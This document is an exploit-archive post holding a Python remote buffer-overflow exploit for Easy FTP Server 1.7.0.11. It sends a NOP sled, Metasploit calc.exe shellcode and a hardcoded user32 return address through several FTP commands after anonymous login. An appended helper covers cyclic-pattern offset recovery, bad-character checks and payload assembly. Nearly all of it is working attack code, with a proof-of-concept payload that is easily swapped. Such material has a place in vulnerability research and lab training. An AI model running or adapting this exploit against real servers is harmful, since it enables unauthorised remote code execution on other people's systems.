
EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD

Posted on 10 August 2010

======================================================================
EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD
======================================================================

# Exploit Title: Easy FTP Server v1.7.0.11 NLST, NLST -al, APPE, RETR, SIZE and XCWD Commands Remote Buffer Overflow Exploit
# Date: 10/8/2010
# Author: Rabih Mohsen
# Software Link: http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3
# CVE:

import socket
import sys

buffersize = 272  # bytes from the start of the command argument to the saved return address

# Metasploit shellcode PoC - calc.exe [228 bytes] [shikata_ga_nai - 1 iteration] [badchars \x00\x0a\x2f\x5c]
# (byte strings so the escapes are sent as raw bytes under Python 3)
shellcode = (b"\xda\xc0\xd9\x74\x24\xf4\xbb\xe6\x9a\xc9\x6d\x5a\x33\xc9\xb1"
             b"\x33\x31\x5a\x18\x83\xea\xfc\x03\x5a\xf2\x78\x3c\x91\x12\xf5"
             b"\xbf\x6a\xe2\x66\x49\x8f\xd3\xb4\x2d\xdb\x41\x09\x25\x89\x69"
             b"\xe2\x6b\x3a\xfa\x86\xa3\x4d\x4b\x2c\x92\x60\x4c\x80\x1a\x2e"
             b"\x8e\x82\xe6\x2d\xc2\x64\xd6\xfd\x17\x64\x1f\xe3\xd7\x34\xc8"
             b"\x6f\x45\xa9\x7d\x2d\x55\xc8\x51\x39\xe5\xb2\xd4\xfe\x91\x08"
             b"\xd6\x2e\x09\x06\x90\xd6\x22\x40\x01\xe6\xe7\x92\x7d\xa1\x8c"
             b"\x61\xf5\x30\x44\xb8\xf6\x02\xa8\x17\xc9\xaa\x25\x69\x0d\x0c"
             b"\xd5\x1c\x65\x6e\x68\x27\xbe\x0c\xb6\xa2\x23\xb6\x3d\x14\x80"
             b"\x46\x92\xc3\x43\x44\x5f\x87\x0c\x49\x5e\x44\x27\x75\xeb\x6b"
             b"\xe8\xff\xaf\x4f\x2c\x5b\x74\xf1\x75\x01\xdb\x0e\x65\xed\x84"
             b"\xaa\xed\x1c\xd1\xcd\xaf\x4a\x24\x5f\xca\x32\x26\x5f\xd5\x14"
             b"\x4e\x6e\x5e\xfb\x09\x6f\xb5\xbf\xe5\x25\x94\x96\x6d\xe0\x4c"
             b"\xab\xf0\x13\xbb\xe8\x0c\x90\x4e\x91\xeb\x88\x3a\x94\xb0\x0e"
             b"\xd6\xe4\xa9\xfa\xd8\x5b\xca\x2e\xbb\x3a\x58\xb2\x12\xd8\xd8"
             b"\x51\x6b\x28")

eip = b"\x91\xC8\x41\x7E"  # 0x7E41C891: CALL EDI in user32.dll (Windows XP SP3); EDI points into our buffer
nopsled = b"\x90" * 16
# NOP filler so that nopsled + shellcode + payload is exactly buffersize bytes and eip lands on the return address
payload = b"\x90" * (buffersize - (len(nopsled) + len(shellcode)))


def GenericEasyFTPExploit(target, CMDS):
    # CMDS is sent verbatim in front of the buffer, so pass the command with its
    # trailing space: any of "NLST ", "NLST -al ", "APPE ", "RETR ", "SIZE " or "XCWD "
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 21))
    s.recv(1024)                      # banner
    s.send(b"USER anonymous\r\n")
    s.recv(1024)
    s.send(b"PASS anonymous\r\n")
    # vulnerable command: the overlong argument overflows the server's stack buffer
    s.send(CMDS.encode() + nopsled + shellcode + payload + eip + b"\r\n")
    s.recv(1024)
    s.send(b"QUIT EASY ftp\r\n")
    s.close()


target = sys.argv[1]
CMDS = sys.argv[2]
GenericEasyFTPExploit(target, CMDS)

# Inj3ct0r.com [2010-08-10]
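The two numbers the exploit rests on are the 272-byte offset to the saved return address and the bad-character list \x00\x0a\x2f\x5c. The Python 3 helper below is an added example, not part of the original exploit: it shows how such an offset is recovered from a crash with a cyclic pattern (the technique behind Metasploit's pattern_create/pattern_offset) and how to check a packet's layout and bad characters before sending it. It assumes the same layout as the exploit (command, 16-byte NOP sled, shellcode, NOP filler, return address, CRLF); the 228-byte placeholder shellcode of 0xcc bytes and the NLST command used in the demo are constructed inputs.

```python
import struct

# Values taken from the exploit header above.
BAD_CHARS = b"\x00\x0a\x2f\x5c"   # bytes the FTP command parser would truncate or mangle
EIP_OFFSET = 272                  # bytes from the start of the argument to saved EIP
RET = b"\x91\xC8\x41\x7E"         # CALL EDI in user32.dll (XP SP3), little-endian


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is
    unique within the first 20280 bytes, so a crash EIP maps to one offset."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(pattern, crash_eip):
    """Map the EIP value read from the debugger (an int) to its offset in the
    pattern, or -1 if absent. x86 stores the return address little-endian."""
    return pattern.find(struct.pack("<I", crash_eip))


def find_bad_chars(data, bad=BAD_CHARS):
    """Sorted list of forbidden byte values that occur in data."""
    return sorted({b for b in data if b in bad})


def build_command(cmd, shellcode, ret=RET, nop_len=16, eip_offset=EIP_OFFSET):
    """Assemble <cmd><nopsled><shellcode><filler><ret>\\r\\n as the exploit does,
    refusing layouts that cannot work: shellcode larger than the space before
    EIP, or bad characters anywhere in the attacker-controlled bytes."""
    nopsled = b"\x90" * nop_len
    filler_len = eip_offset - nop_len - len(shellcode)
    if filler_len < 0:
        raise ValueError("shellcode (%d bytes) does not fit before EIP" % len(shellcode))
    controlled = nopsled + shellcode + b"\x90" * filler_len + ret
    bad = find_bad_chars(controlled)
    if bad:
        raise ValueError("bad chars present: " + ", ".join("0x%02x" % b for b in bad))
    return cmd + controlled + b"\r\n"


def ret_slice(packet, cmd, eip_offset=EIP_OFFSET):
    """The four bytes of the packet that overwrite the saved return address."""
    start = len(cmd) + eip_offset
    return packet[start:start + 4]


if __name__ == "__main__":
    # Stage 1: send a pattern instead of the real buffer, read EIP from the
    # debugger at the crash. Here the crash value is simulated (constructed).
    pat = cyclic_pattern(300)
    crash_eip = struct.unpack("<I", pat[272:276])[0]
    print("EIP 0x%08x -> offset %d" % (crash_eip, pattern_offset(pat, crash_eip)))

    # Stage 2: check the real layout before firing. Placeholder shellcode
    # (constructed): 228 bytes of int3, the same size as the calc.exe payload.
    pkt = build_command(b"NLST ", b"\xcc" * 228)
    print("packet %d bytes, return address bytes %r" % (len(pkt), ret_slice(pkt, b"NLST ")))
```

With the exploit's own 228-byte shellcode and 16-byte sled the filler works out to 28 NOPs; a shellcode larger than 256 bytes, or one encoded without excluding the four bad characters, is rejected here instead of producing a silent non-crash on the target.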
